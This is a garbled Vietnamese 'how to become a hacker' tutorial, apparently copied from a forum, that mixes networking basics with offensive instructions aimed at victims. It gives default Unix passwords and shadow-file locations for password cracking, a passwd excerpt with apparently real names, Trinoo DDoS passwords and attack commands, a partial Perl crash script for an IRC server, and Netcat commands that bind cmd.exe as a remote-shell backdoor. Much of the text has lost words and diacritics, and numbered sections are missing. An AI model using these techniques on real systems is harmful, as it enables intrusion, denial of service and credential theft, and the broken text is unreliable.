Com hacker 641 Những hiểu biết cơ bản nhất để trở thành Hacker

61 33 0
  • Loading ...
1/61 trang

Thông tin tài liệu

Ngày đăng: 18/01/2018, 13:13

Copy By:Thành Long-0989204700 Diễn đàn CNTT http://WwW.Caodangquantrimang.321.cn (Cấm lưu hình thức) Những hiểu biết để trở thành Hacker Nhiều bạn Newbie có hỏi tơi “ Hack ? Làm để hack ?” Nhưng bạn quên điều bạn cần phảI có kiến thức cách tổng quát , hiểu thuật ngữ mà người rành mạng hay sử dụng Riêng tơi chưa thật giỏi qua nghiên cứu tổng hợp số kiến thức , muốn chia sẻ cho tất bạn , nhằm bạn học hỏi Tôi khơng chịu trách nhiệm bạn dùng để quậy phá ngườI khác Các bạn copy post trang Web khác điền tiên tác giả dướI , tôn trọng viết tơn trọng tơi cơng sức tơi , đồng thờI tơn trọng thân bạn Trong tơi có chèn thêm số cách hack , crack ví dụ , bạn ứng dụng thử nghiên cứu đọc để hiểu thêm , rồ bắt gặp từ mà bạn không hiểu đọc để biết , tơi có sử dụng số ý viết mà thấy hay từ trang Web HVA , trang Web khác mà ghé thăm Xin cảm ơn tác giả viết Bây vấn đề =================================================== = ) Ta cần để bắt đầu ? Có thể nhiều bạn không đồng ý với cách tốt để thực tập bạn dùng HĐH Window 9X , rồI đến khác mạnh Linux Unix , dướI bạn cần có : + Một OS ( DOS , Window 9X , Linux , Unit ….) + Một trang Web tốt ( HVA chẳng hạn hi`hi` greenbiggrin.gif greenbiggrin.gif ) + Một trình duyệt mạng tốt ( Nescape , IE , tốt có lẽ Gozzila ) + Một cơng cụ chat tốt ( mIRC ,Yahoo Mass … ) + Telnet ( tương tự nmap …) + Cái quan trọng mà muốn trở thành hacker phảI có chút kiến thức lập trình ( C , C++ , Visual Basic , Pert … ) ) Thế địa IP ? _ Địa IP chia thành số giới hạn từ - 255 Mỗi số lưu byte - > !P có kicks thước 4byte, chia thành lớp địa Có lớp A, B, C Nếu lớp A, ta có 16 triệu điạ chỉ, lớp B có 65536 địa Ví dụ: Ở lớp B với 132.25,chúng ta có tất địa từ 132.25.0.0 đến 132.25.255.255 Phần lớn địa lớp A llà sở hữu công ty hay tổ chức Một ISP thường sở hữu vài địa lớp B C Ví dụ: Nếu địa IP bạn 132.25.23.24 bạn xác định ISP bạn ( có IP 132.25.x.) _ IP từ viết tắt Internet Protocol, Internet địa IP mỗI người đạI diện cho ngườI đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy qua cách sau : + bạn lướt qua trang web, IP bạn bị ghi lại + IRC, có IP bạn + ICQ, người biết IP bạn, chí bạn chọn ``do not show ip`` người ta lấy + bạn kết nối với đó, họ gõ ``systat –n ``, biết kết nối đên họ + gửi cho bạn email với đoạn mã java tóm IP, họ tóm IP bạn ) Làm để biết địa IP ? _ Trong Run đánh lệnh “winipcfg” Window : vào Start _ Trong mIRC : kết nốI đến máy chủ sau đánh lệnh “/dns ” _ Thơng qua số trang Web có hiển thị IP ) IP Spoofing ? _ Một số IP có mục đích để xác định thiết bị giới Vì mạng máy chủ cho phép thiết bị khác trao đổi liệu qua lại mà không cần kiểm tra máy chủ Tuy nhiên thay đổi IP bạn, nghĩa bạn gởi thơng tin giả đến máy khác mà máy tin thơng tin nhận xuất phát từ máy (tất nhiên khơng phải máy bạn) Bạn vượt qua máy chủ mà khơng cần phải có quyền điều khiến máy chủ Điều trở ngại chỗ thông tin phản hồi từ máy chủ gởi đến thiết bị có IP mà giả mạo Vì bạn khơng có phản hồi thơng tin mà mong muốn Có lẽ điều mà spoof IP có hiệu bạn cần vượt qua firewall, trộm account cần dấu thông tin cá nhân! ) Trojan / worm / virus / logicbomb ? _ Trojan : Nói cho dễ hiểu chương trình điệp viên cài vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặc biệt cài ( lây lan từ máy khác ) lên máy nạn nhân thực yêu cầu mã , đa số virut sử dụng để phá hoạI liệu phá hoạI máy tính _ worm : Đây chương trình độc lập tự nhân bản thân lây lan khắp bên mạng Cũng giống Virut , phá hoạI liệu , phá hoạI bên mạng , nhiều làm down mang _ logicbomb : Là chương trình gửi lúc nhiều gói liệu cho địa , làm ngập lụt hệ thống , tắt nghẽn đường truyền ( server ) dùng làm công cụ để “khủng bố” đốI phương ( bom Mail ) ;) ) PGP ? _ PGP viết tắt từ “Pretty Good Privacy” , cơng cụ sử dụng mã hố chìa khố cơng cộng để bảo vệ hồ sơ Email liệu , dạng mã hố an tồn cao sử dụng phần mềm cho MS_DOS , Unix , VAX/VMS cho dạng khác ) Proxy ? _Proxy cung cấp cho người sử dụng truy xuất internet với host đơn Những proxy server phục vụ nghi thức đặt biệt tập nghi thức thực thi dual_homed host basion host Những chương trình client người sử dung qua trung gian proxy server thay cho server thật mà người sử dụng cần giao tiếp Proxy server xác định yêu cầu từ client định đáp ứng hay không đáp ứng, yêu cầu đáp ứng, proxy server kết nối với server thật thay cho client tiếp tục chuyển tiếp đến yêu cầu từ clientđến server, đáp ứng yêu cầu server đến client Vì proxy server giống cầu nối trung gian server client _ Proxy cho user truy xuất dịch vụ internet theo nghĩa trực tiếp Với dual host homed cần phải login vào host trước sử dụng dịch vụ internet Điều thường không tiện lợi, số người trể nên thất vọng họ có cảm giác thơng qua firewall, với proxy giải vấn đề Tất nhiên có giao thức nói chung tiện lợi cho user Bởi proxy cho phép user truy xuất dịch vụ internet từ hệ thống cá nhân họ, khơng cho phép packet trực tiếp hệ thống sử dụng internet đường giáng tiếp thông qua dual homed host thông qua kết hợp bastion host screening rounter ) Unix ? _ Unix hệ điều hành ( giống Window ) Nó hệ điều hành mạnh , thân thiết với Hacker Nếu bạn trở thành hacker thật HĐH khơng thể thiếu đối vớI bạn Nó sử dụng hỗ trợ cho lập trình ngơn ngữ C ) Telnet ? _ Telnet chương trình cho phép ta kết nốI đến máy khác thông qua cổng ( port ) MọI máy tính máy chủ ( server ) có cổng , sau số cổng thông dụng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ Ví dụ : bạn gọI Telnet để kết nốI đến mail.virgin.net port 25 10 ) Làm để biết Telnet đến hệ thống Unix ? _ Ok , tơi nói cho bạn biết hệ thống Unix chào hỏI bạn bạn kết nối tới Đầu tiên , bạn gọi Unix , thơng thường xuất dấu nhắc : “ Log in : ” , ( nhiên , với chưa chắn Unix ngoạI trừ chúng xuất thông báo trước chữ “ log in :” ví dụ : Welcome to SHUnix Please log in ….) Bây ta tạI dấu nhắc “log in” , bạn cần phảI nhập vào account hợp lệ Một account thông thường gồm có đặc tính , sau bạn nhập account vào , bạn thấy có mật , bạn thử nhập Default Password thử theo bảng sau : Account -Default Password Root - Root Sys Sys / System / Bin Bin -Sys / Bin Mountfsy M ountfsys Nuuc - Anon Anon - Anon User - -User Games -G ames Install Install Demo - Demo Guest Guest 11 ) shell account ? _ Một shell account cho phép bạn sử dụng máy tính nhà bạn thiết bị đầu cuốI ( terminal ) mà vớI bạn đánh lệnh đến máy tính chạy Unix , “Shell” chương trình có nhiệm vụ dịch ký tự bạn gửi đến rồI đưa vào thực lệnh chương trình Unix VớI shell account xác bạn sử dụng trạm làm việc mạnh nhiều so vớI mà bạn tưởng tượng đến Bạn lấy “shell account” miễn phí tạI trang Web http://www.freeshell.com/ nhiên bạn khơng sử dụng “telnet” bạn trả tiền cho 12 ) Làm cách để bạn crack Unix account passwords ? _ Rất đơn giản , nhiên cách mà tơi nói vớI bạn “lạc hậu” rồI , bạn crack chúng bạn may mắn , khơng bạn đọc để tham khảo _ Đầu tiên bạn đăng nhập vào hệ thống có sử dụng Unix khách hàng ngườI khách ghé thăm , may mắn bạn lấy mật cất dấu hệ thống chuẩn : /etc/passwd hàng hồ sơ passwd có tài khoản khác , giống hàng : userid:password:userid#:groupid#:GECOS field:home dir:shell : + userid = the user id name : tên đăng nhập : tên số + password : mật mã Dùng để làm hẳn bạn biết rồI + userid# : số đựơc thông báo cho ngườI đăng ký họ đăng ký mớI lần + groupid# : tương tự userid# , dùng cho ngườI nhóm ( nhóm Hunter Buq HVA chẳng hạn ) + GECOS FIELD : nơi chứa thông tin cho ngườI sử dụng , có họ tên đầy đủ , số điện thoại , địa v.v… Đây nguồn tốt để ta dễ dàng crack mật + home dir : thư mục ghi lạI hoạt động người khách họ ghé thăm ( giống mục History IE ) + Shell : tên shell mà tự động bắt đầu ta login _ Hãy lấy file password , lấy file text mã hoá , sau bạn dùng chương trình ``CrackerJack`` ``John the Ripper`` để crack _ Các bạn thấy dễ phảI không ? Sai bét , không dễ dàng may mắn để bạn crack hầu hết họ cất kỹ , đọc tiếp bạn thấy khó khăn chỗ 13 ) shadowed password ? _ Một shadowed password biết đến file Unix passwd , bạn nhập mật , ngườI khác thấy trình đơn ( ký hiệu “ X ” “ * ” ) Cái thông báo cho bạn biết file passwd cất giữ nơi khác , nơi mà ngườI sử dụng bình thường khơng thể đến Khơng lẽ ta đành bó tay , dĩ nhiên đốI vớI hacker khơng rùi , ta không đến trực tiếp file shadowed password ta tìm file lưu , file Unshadowed Những file hệ thống Unix không cố định , bạn thử vớI đường dẫn sau : CODE AIX /etc/security/passwd ! or /tcb/auth/files/ / A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/ / SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow maps/tables/whatever > System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trước dấu “ / ”đầu tiên hàng tên hệ thống tương ứng , vào hệ thông thật bạn muốn lấy rồI lần theo đường dẫn phía sau dấu “/”đầu tiên Và cuốI account passwd mà tơi crack , hết hiệu lực rồI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh Để bảo đảm bí mật nên pass họ tơi xố để vào ký hiệu “ x ” , bạn tìm hiểu thơng tin có từ chúng xem 14 ) Vitual port ? _ Vitual port ( cổng ảo ) số tự nhiên đựợc gói TCP(Tranmission Control Protocol) UDP(User Diagram Protocol) header Như nguòi biết, Windows chạy nhiều chương trình lúc, chương trình có cổng riêng dùng để truyền nhận liệu Ví dụ máy có địa IP 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, dịch vụ đuọc chạy IP address 127.0.0.1, gói tin đuọc gửi đến làm máy tính phân biệt gói tin vào dịch vụ WebServer hay FTP server hay SM! TP? Chính Port xuất Mỗi dịch vụ có số port mặc định, ví dụ FTP có port mặc định 21, web service có port mặc định 80, POP3 110, SMTP 25 vân vân Người quản trị mạng thay đổi số port mặc định này, bạn ko biết số port máy chủ, bạn ko thể kết nối vào dịch vụ Chắc bạn nghe nói đến PORT MAPPING có lẽ chưa biết chức Port mapping thực đơn giản trình chuyển đổi số port mặc định dịch vụ đến số khác Ví dụ Port mặc định WebServer 80, có lẽ bạn thấy http://www.xxx.com:8080/ , 8080 số port host xxx đuợc nguòi quản trị host ``map`` từ 80 thành 8080 15 ) DNS ? _ DNS viết tắt Domain Name System Một máy chủ DNS đợi kết nối cổng số 53, có nghĩa bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53 Máy chủ chạy DNS chuyển hostname chữ thành chữ số tương ứng ngược lại Ví dụ: 127.0.0.1 > localhost localhost - > 127.0.0.1 16 ) Đôi điều Wingate : _ WinGate chương trình đơn giản cho phép bạn chia kết nối Thí dụ: bạn chia sẻ modem với nhiều máy WinGate dùng với nhiều proxy khác che giấu bạn _ Làm để Wingate che dấu bạn ? Hãy làm theo : Bạn telnet cổng 23 máy chủ chạy WinGate telnet proxy bạn có dấu nhắc WinGate > Tại dấu nhắc bạn đánh vào tên server, khoảng trống cổng bạn muốn kết nối vào VD : CODE telnet wingate.net WinGate > victim.com 23 ta telnet đến cổng 23 cổng mặc định bạn cài Wingate lúc IP máy mà victim chộp ta IP máy chủ chứa Wingate proxy _ Làm để tìm Wingate ? + Nếu bạn muốn tìm IP WinGates tĩnh (IP khơng đổi) đến yahoo hay trang tìm kiếm cable modem Tìm kiếm cable modems nhiều người dùng cable modems có WinGate để họ chia sẻ đường truyền rộng cable modems cho máy khác nhà Hoặc bạn dùng Port hay Domain scanners scan Port 1080 + Để tìm IP động (IP thay đổi lần user kết nối vào internet) WinGates bạn dùng Domscan chương trình qt khác Nếu dùng Domscan bạn nhập khoảng IP vào box số 23 vào box thứ Khi có kết , bạn thử telnet đến địa IP tìm đựơc ( hướng dẫn ), xuất dấu “Wingate > ” bạn tìm máy sử dụng Wingate rồI + Theo kinh nghiệm tơi bạn down wingatescanner mà sài , có nhièu mạng 17 ) Đôi điều Traceroute : _ Traceroute chương trình cho phép bạn xác định đường gói packets từ máy bạn đến hệ thống đích mạng Internet _ bạn xem VD sau : CODE C:\windows > tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops abc.netzero.com (232.61.41.251) ms ms ms xyz.Netzero.com (232.61.41.0) ms ms ms 232.61.41.10 (232.61.41.251) ms 11 ms 13 ms we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 196.23.0.25 (196.23.0.25) 1195 ms1204 ms backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms Tôi cần biết đường từ máy đến host mạng Internet có địa ip 203.94.12.54 Tơi cần phải tracert đến nó! Như bạn thấy trên, gói packets từ máy tơi muốn đến 203.94.12.54 phải qua 13 hops(mắc xích) mạng Đây đưòng gói packets _ Bạn xem VD : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets isp.net (202.xy.34.12) 20ms 10ms 10ms xyz.com (202.xx.12.34) 130ms 130ms 130ms + Dòng cho biết hostname địa IP hệ thống đích Dòng cho biết thêm giá trị TTL Binnary Khi chạy , Deadmons dấu nhắc chờ passwd nhập vào , passwd nhập sai tự động passwd nhập tự động chạy hệ thống attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]` kwijibo Connection closed by foreign host < == Bạn nhập sai attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]` betaalmostdone trinoo v1.07d2+f3+c [rpm8d/cb4Sx/] trinoo > < == bạn vào hệ thống trinoo _ Đây vài passwd mặc định : “l44adsl``: pass trinoo daemon ``gorave``: passwd trinoo master server startup ``betaalmostdone``: passwd điều khiển từ xa chung cho trinoo master ``killme``: passwd trinoo master điều khiển lệnh ``mdie`` _ Đây số lệnh dùng để điều khiển Master Server: CODE die Shutdown quit - -Log off mtimer N Đặt thờI gian để công DoS , vớI N nhận giá trị từ > 1999 giây dos IP - Tấn công đến địa IP xác định mdie pass - Vơ hiệu hố tất Broadcast , passwd xác Một lệnh đưọc gửi tới (``d1e l44adsl``) Broadcast để Shutdown chúng Một passwd riêng biệt đặt cho mục mping Gửi lệnh ping tới (``png l44adsl``) c¸c Broadcast mdos Send nhiều lênh DOS (``xyz l44adsl 123:ip1:ip2``) đến Broadcast info - Hiển thị thông tin Trinoo msize Đặt kích thước đệm cho gói tin send suốt thờI gian DoS nslookup host X ác định tên thiết bị Host mà Master Trinoo chạy usebackup -Chuyển tớI file Broadcast lưu tạo lệnh “killdead” bcast -Liệt kê danh sách tất Broadcast khai thác help [cmd] - Đưa danh sách lệnh mstop -Ngừng lại cuốc công DOS _ Đây số lệnh dùng để điều khiển Trinoo Deadmons: CODE aaa pass IP - -Tấn công đến địa IP xác định GửI gói tin UDP (0-65534) đến cổng UDP địa IP xác định khoảng thời gian xác định mặc định 120s hay từ > 1999 s bbb pass N -Đặt thờI gian giới hạn cho công DOS Shi pass - -Gửi chuỗi “*HELLO*” tới dánh sách Master Server biên dịch chương trình cổng 31335/UDP png pass - Send chuỗi “Pong” tớI Master Server phát hành lệnh điều khiển cổng 31335/UDP die pass - -Shutdown Trinoo rsz N Là kích thước đệm dùng để cơng , tính byte xyz pass 123:ip1:ip3 công DOS nhiều mục tiêu lúc Còn nhiều đoạn mã cách ứng dụng để DoS , bạn chịu khó tìm hiểu thêm Nhưng đừng công lung tung , server HVA , coi chừng khơng thu hiệu mà bị lock nick 42 ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC Server IRC thơng dụng Internet ,nó bị Crash bị Hacker gửi Packet lớn giá trị ( 65000 ký tự ) cho phép đến Port 6667 Bạn thực việc cách Telnet đến WircSrv Port 6667: Nếu bạn dùng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com Connected to example.com Escape character is `^]` [buffer] Windows tương tự: telnet irc.example.com 6667 Lưu ý: [buffer] Packet liệu tương đương với 65000 ký tự Tuy nhiên , crash đơn giản đoạn mã sau ( Các bạn nhìn vào đoạn mã tự giải mã câu lệnh , cách tập luyện cho phản xạ hacker họ nghiên cứu Nào , phân tích cách ): CODE #!/usr/bin/perl #< == Đoạn mã cho ta biết dùng cho lệnh perl use Getopt::Std; use Socket; getopts(`s:`, \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto); $foo = ``A``; # Đây NOP $number = ``65000``; # Đây tất số NOP $data = $foo x $number; # kết $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa $port = 6667; # lệnh điều khiển cổng từ xa , mặc định 6667 $buf = ``$data``; $in_addr = (gethostbyname($serv))[4] 47 ) Các công cụ cần thiết để hack Web : _ Đối với hacker chun nghiệp họ khơng cần sử dụng công cụ mà họ trực tiếp setup phiên mà trang Web nạn nhân sử dụng máy để test lỗi Nhưng bạn “vào nghề” cơng cụ cần thiết , sử dụng chúng vài lần bạn biết cách phối hợp chúng để việc tìm lỗi trang Web nạn nhân nhanh chóng Sau số cơng cụ bạn cần phải có máy “làm ăn” : _ Cơng cụ thứ : Một proxy dùng để che dấu IP vượt tường lửa cần ( Cách tạo Proxy bày phần , bạn xem lại ) _ Công cụ thứ : Bạn cần có shell account, thực quan trọng bạn Một shell account tốt shell account cho phép bạn chạy chương trình nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, shell account cần phải cài chương trình GCC ( quan trọng việc dịch (compile) exploit viết C) MinGW, Cygwin dev tools khác Shell account gần giống với DOS shell,nhưng có nhiều câu lệnh chức DOS Thơng thường bạn cài Unix bạn có shell account, bạn khơng cài Unix bạn nên đăng ký mạng shell account free có cài Unix thiết lập cho bạn shell account bạn log vào telnet (Start > Run > gõ Telnet) để dùng shell account Sau số địa bạn đăng ký free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.html http://www.ultrashell.net/ _Công cụ thứ : NMAP Công cụ quét cực nhanh mạnh Có thể quét mạng diện rộng đặc biệt tốt mạng đơn lẻ NMAP giúp bạn xem dịch vụ chạy server (services / ports : webserver , ftpserver , pop3, ),server dùng hệ điều hành gì,loại tường lửa mà server sử dụng, nhiều tính khác.Nói chung NMAP hỗ trợ hầu hết kỹ thuật quét : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open), NMAP đánh giá công cụ hàng đầu Hacker nhà quản trị mạng giới Mọi thông tin NMAP bạn tham khảo http://www.insecure.org/ _ Công cụ thứ : Stealth HTTP Security Scanner công cụ quét lỗi bảo mật tuyệt vời Win32 Nó quét 13000 lỗi bảo mật nhận diện 5000 exploits khác _ Công cụ thứ : IntelliTamper công cụ hiển thị cấu trúc Website gồm thư mục file nào, liệt kê thư mục file có set password Rất tiện cho việc Hack Website trước bạn Hack Website bạn phải nắm số thơng tin Admin Website _ Cơng cụ thứ : Netcat công cụ đọc ghi liệu qua mạng thông qua giao thức TCP UDP Bạn dùng Netcat cách trực tiếp sử dụng chương trình script khác để điều khiển Netcat Netcat coi exploitation tool tạo liên kết bạn server cho việc đọc ghi liệu ( tất nhiên Netcat cài server bị lỗI ) Mọi thơng tin Netcat bạn tham khảo http://www.l0pht.com/ _ Công cụ thứ : Active Perl công cụ đọc file Perl *.pl exploit thường viết Perl Nó sử dụng để thi hành lệnh thông qua file *.pl _ Công cụ thứ : Linux hệ điều hành hầu hết hacker sử dụng _ Công cụ thứ : L0phtCrack công cụ số để Crack Password Windows NT/2000 _ Cách Download bày nên khơng nói , bạn Download nhớ ý đến phiên chúng , phiên có số lớn bạn Down mà sài có thêm số tính mà phiên trước chưa có Nếu down mà bạn khơng biết sử dụng tìm lại viết cũ có hướng dẫn bên Box “Đồ nghề” Nếu khơng thấy post hỏi , bạn bên trả lời cho bạn 48 ) Hướng dẫn sử dụng Netcat : a ) Giới thiệu : Netcat công cụ thiếu bạn muốn hack website mạnh tiện dụng Do bạn cần biết chút Netcat b ) Biên dịch : _ Đối với Netcat cho Linux, bạn phải biên dịch trước sử dụng - hiệu chỉnh file netcat.c vi: vi netcat.c + tìm dòng res_init(); main() thêm vào trước dấu ``/``: // res_init(); + thêm dòng sau vào phần #define (nằm đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: /nc -h - bạn muốn chạy Netcat nc thay cho /nc, bạn cần hiệu chỉnh lại biến môi trường PATH file ~/.bashrc, thêm vào ``:.`` PATH=/sbin:/usr/sbin: : _ Bản Netcat cho Win khơng cần phải compile có sẵn file nhị phân nc.exe Chỉ giải nén chạy xong c ) Các tùy chọn Netcat : _ Netcat chạy chế độ dòng lệnh Bạn chạy nc -h để biết tham số: CODE C:\ > nc -h connect to somewhere: nc [-options] hostname port [ports] listen for inbound: nc -l -p port [options] [hostname] [port] options: -d - tách Netcat khỏi cửa sổ lệnh console, Netcat chạy chế độ steath(không hiển thị Taskbar) -e prog - thi hành chương trình prog, thường dùng chế độ lắng nghe -h - gọi hướng dẫn -i secs - trì hỗn secs mili giây trước gởi dòng liệu -l - đặt Netcat vào chế độ lắng nghe để chờ kết nối đến -L buộc Netcat ``cố`` lắng nghe Nó lắng nghe trở lại sau ngắt kết nối -n dùng địa IP dạng số, chẳng hạn 192.168.16.7, Netcat không thẩm vấn DNS -o file ghi nhật kí vào file -p port - định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr - giả mạo địa IP nguồn addr -t - không gởi thông tin phụ phiên telnet Khi bạn telnet đến telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client bạn gởi đến thông tin phụ biến môi trường TERM, USER Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat không gởi thông tin đến telnetd -u - dùng UDP(mặc định netcat dùng TCP) -v - hiển thị chi tiết thông tin kết nối -vv - hiển thị thông tin chi tiết -w secs đặt thời gian timeout cho kết nối secs mili giây -z - chế độ zero I/O, thường sử dụng scan port Netcat hổ trợ phạm vi cho số hiệu cổng Cú pháp cổng1-cổng2 Ví dụ: 18080 nghĩa 1,2,3, ,8080 d ) Tìm hiểu Netcat qua VD : _ Chộp banner web server : Ví dụ: nc đến 172.16.84.2, cổng 80 CODE C:\ > nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại bạn gõ Enter lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thơng tin chi tiết kết nối, bạn dùng –v ( -vv cho biết thông tin chi tiết nữa) C:\ > nc -vv 172.16.84.1 80 CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: ``0-cec-3899eaea`` Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, dùng -o Ví dụ: nc -vv -o nhat_ki.log 172.16.84.2 80 xem file nhat_ki.log xem thử ghi : CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) LastModifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T ETag: ``0cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea`` Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # ContentLength: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308 Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l dấu < nghĩa server gởi đến netcat dấu > nghĩa netcat gởi đến server _ Quét cổng : Bạn chạy netcat với tùy chọn –z Nhưng để quét cổng nhanh hơn, bạn dùng -n netcat khơng cần thấm vấn DNS Ví dụ để scan cổng TCP(1- > 500) host 172.16.106.1 CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open bạn cần scan cổng UDP, dùng -u CODE [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Biến Netcat thành trojan : Trên máy tính nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành chương trình có kết nối đến, thường shell lệnh cmd.exe ( NT) /bin/sh(đối với Unix) Ví dụ: CODE E:\ > nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để công, bạn việc dùng netcat nối đến máy nạn nhân cổng định, chẳng hạn 8080 CODE C:\ > nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp E:\ > cd test cd test E:\test > dir /w dir /w Volume in drive E has no label Volume Serial Number is B465-452F Directory of E:\test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe File(s) 262,499 bytes Dir(s) 191,488,000 bytes free C:\test > exit exit sent 20, rcvd 450: NOTSOCK Như bạn thấy , ta làm máy nạn nhân , cần số lệnh , ta chiếm máy tính đối phương , bạn xem tiếp : CODE E:\ > nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ? ? Riêng Netcat cho Win, bạn lắng nghe cổng lắng nghe Chỉ cần định địa nguồn -s Ví dụ: CODE netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 